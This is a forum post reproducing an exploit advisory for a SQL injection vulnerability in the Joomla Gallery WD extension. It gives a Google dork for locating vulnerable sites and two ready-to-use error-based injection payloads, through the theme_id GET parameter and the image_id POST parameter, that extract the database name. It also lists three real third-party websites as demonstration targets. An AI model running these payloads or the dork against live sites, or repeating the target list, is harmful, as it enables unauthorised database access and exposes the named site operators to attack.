Aerosol Posted March 30, 2015 Report Posted March 30, 2015 ####################################################################### Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability # Google Dork: inurl:option=com_gallery_wd# Date: 29.03.2015# Exploit Author: CrashBandicot (@DosPerl)# Vendor HomePage: http://web-dorado.com/# Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd# Tested on: Windows######################################################################parameter 'theme_id' in GET vulnerable# Example :# Parameter: theme_id (GET)# Type: error-based# GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)# ==================================================================================== #parameter 'image_id' in POST vulnerable# Example :# URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2# Parameter: image_id (POST)# Type: error-based# POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search# ~ Demo ~ # $>http://www.cnct.tg/http://www.nswiop.nsw.edu.au/http://cnmect.licee.edu.ro/#EOFSource Quote